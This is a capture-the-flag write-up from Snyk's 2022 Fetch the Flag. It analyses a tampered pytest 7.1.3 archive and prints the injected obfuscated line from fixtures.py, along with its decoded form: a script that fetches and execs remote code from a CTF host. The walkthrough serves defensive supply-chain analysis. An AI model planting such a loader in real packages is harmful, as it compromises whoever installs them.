Fetch the Flag CTF 2022 writeup: Pay Attention
Assaf Ben Josef
November 10, 2022
0 mins readThanks for playing Fetch with us! Congrats to the thousands of players who joined us for Fetch the Flag CTF. And a huge thanks to the Snykers that built, tested, and wrote up the challenges!
In this post, we’ll take a look at how our team tackled the pay-attention challenge of Snyk’s 2022 Fetch the Flag CTF. This challenge simulates a case where a popular package has likely been hijacked and turned malicious — and we’ll be taking on the role of the security researcher looking into the issue!
Walkthrough
When we start, we are greeted with a downloadable file pytest-7.1.3.tar.gz
, and the hint “Have you been payin’ attention lately?”.
Right off the bat, we notice the file name. Pytest is a super popular Python testing framework, and as of this writing, 7.1.3 is its latest release version. So, it seems that this file is supposed to be an archive of the latest pytest release.
Now, it definitely can’t be a 1:1 copy of the real pytest 7.1.3, because otherwise we’d have nothing to go on! To verify that, we’ll go to the pytest GitHub repository, and download the source code for the 7.1.3 release. If we inspect the properties of these archive files, we’ll be able to spot that the CTF version of pytest is just a tiny bit larger than the original pytest release.
To find where exactly is the difference between these two archives, what we can do is extract the folders and compare them using our terminal’s diff -rq
command, which will recursively iterate over folder contents and look for file differences, like so:
Now, we find some minor differences in a few metadata files. But also, and more importantly, one of the actual source code files, fixtures.py
is different between these two folders — that must be it!
Paying attention to suspicious code
Inspecting the file with our favorite IDE, by scrolling through the file for a bit (or by the IDE alerting us of an unexpected indent), we’ll find this suspicious line of code:
1__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').exec(__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').compile(__import__('\x62\x61\x73\x65\x36\x34').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZgpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zcwoKX3R0bXAgPSBfZmYoZGVsZXRlPUZhbHNlKQpfdHRtcC53cml0ZShiIiIiZnJvbSB1cmxsaWIucmVxdWVzdCBpbXBvcnQgdXJsb3BlbiBhcyBfdXU7ZXhlYyhfdXUoJ2h0dHA6Ly9wYXktYXR0ZW50aW9uLmMuY3RmLXNueWsuaW8vaW5qZWN0b3InKS5yZWFkKCkpIiIiKQpfdHRtcC5jbG9zZSgpCnRyeTogX3NzKGYie19lZX0ge190dG1wLm5hbWV9IikKZXhjZXB0OiBwYXNz"),'<string>','\x65\x78\x65\x63'))
From a first impression, this line seems to be importing some libraries, and then invoking some interesting function calls, like b64decode
and exec
. This is definitely suspicious, but we can’t really know what is going on yet, so let’s get to decoding.
We’re going to start with the shorter strings that share a similar pattern, like \x65\x78\x65\x63
.
Some of us might be familiar with the fact that Python 3 uses unicode to represent strings, and if we dive deeper into the Python 3 documentation, we’ll find that this pattern is merely a two-digit hex representation of unicode code points.
But, we don’t actually need to know all that. Observing the line of code, we can see that these strings are passed as-is into built-in Python functions, such as __import__()
, and therefore we can assume that the Python interpreter already knows how to handle them. So, if we spin up a Python REPL, we can call the print()
function with any of these strings, which will print out the human-readable unicode representation of these. In example, print(‘\x65\x78\x65\x63’)
would give us the string exec
. Neat!
After resolving all these, we will be left with this result:
1__import__('builtins').exec(
2 __import__('builtins').compile(
3 __import__('base64').b64decode(
4 "ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZgpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zcwoKX3R0bXAgPSBfZmYoZGVsZXRlPUZhbHNlKQpfdHRtcC53cml0ZShiIiIiZnJvbSB1cmxsaWIucmVxdWVzdCBpbXBvcnQgdXJsb3BlbiBhcyBfdXU7ZXhlYyhfdXUoJ2h0dHA6Ly9wYXktYXR0ZW50aW9uLmMuY3RmLXNueWsuaW8vaW5qZWN0b3InKS5yZWFkKCkpIiIiKQpfdHRtcC5jbG9zZSgpCnRyeTogX3NzKGYie19lZX0ge190dG1wLm5hbWV9IikKZXhjZXB0OiBwYXNz"),
5 '<string>', 'exec'))
Seems like this script decodes a base-64 string, compiles it, and then executes it. Next up, we’d like to know what is the piece of code that is being executed here - so let’s decode that base-64 string, using any sort of online decoding tool. This is what we’re getting:
1from tempfile import NamedTemporaryFile as _ff
2from sys import executable as _ee
3from os import system as _ss
4
5_ttmp = _ff(delete=False)
6_ttmp.write(b"""from urllib.request import urlopen as _uu;exec(_uu('http://pay-attention.c.ctf-snyk.io/injector').read())""")
7_ttmp.close()
8try: _ss(f"{_ee} {_ttmp.name}")
9except: pass
This time, the code seems to create a temporary file, write a short script into it, and then execute it. The script in that temporary file will download and execute a piece of code from an online resource (on the Snyk CTF domain).
We’d like to keep following the breadcrumbs and finally figure out what is the piece of code being executed at the end of this chain, but we’re met with a pretty tough cookie. The code that is being downloaded is totally obfuscated! The only comprehensible portion of it is the one at the very top — but it tells us the name and GitHub repo of the tool that was used to obfuscate this code — Hyperion.
Now, our first instinct could be that because we have the obfuscated script and the source code of the obfuscator tool, we should put on our reverse-engineering hat and get to work. However, because this script seems well-obfuscated, and because the obfuscator GitHub repository README file says that there is currently no deobfuscator available, we figured we should exhaust all other options first.
With that mindset, we decided to first download this obfuscated script into a local file, and spin up a debugging environment to see if we can find anything interesting that is happening on runtime. Using our favorite IDE, we can debug and execute this code line by line to monitor what is happening.
Security disclaimer
If this were a real-life scenario and we were dealing with a script that is actually intended to cause harm, we’d do all this in a secure sandbox environment!
And, luckily, eventually our little eye will be able to spy the flag hiding between one of the declared variables (after cleaning up the backslashes):
Attention paid!
So, just to recap, we’ve had:
A seemingly innocent package, that had a suspicious line of code injected in one of its files
The line of code compiles and executes a base-64 encoded script
That script creates and executes a temporary file
That file accesses a remote resource to download an obfuscated script and then executes it
Inspecting and debugging that obfuscated script, we were finally able to find the flag hidden among its declarations.
This type of multi-layered obfuscation is very common when it comes to malicious script injections. What a trip!
Want to learn how we found all the other flags? Check out our Fetch the Flag solutions page to see how we did it.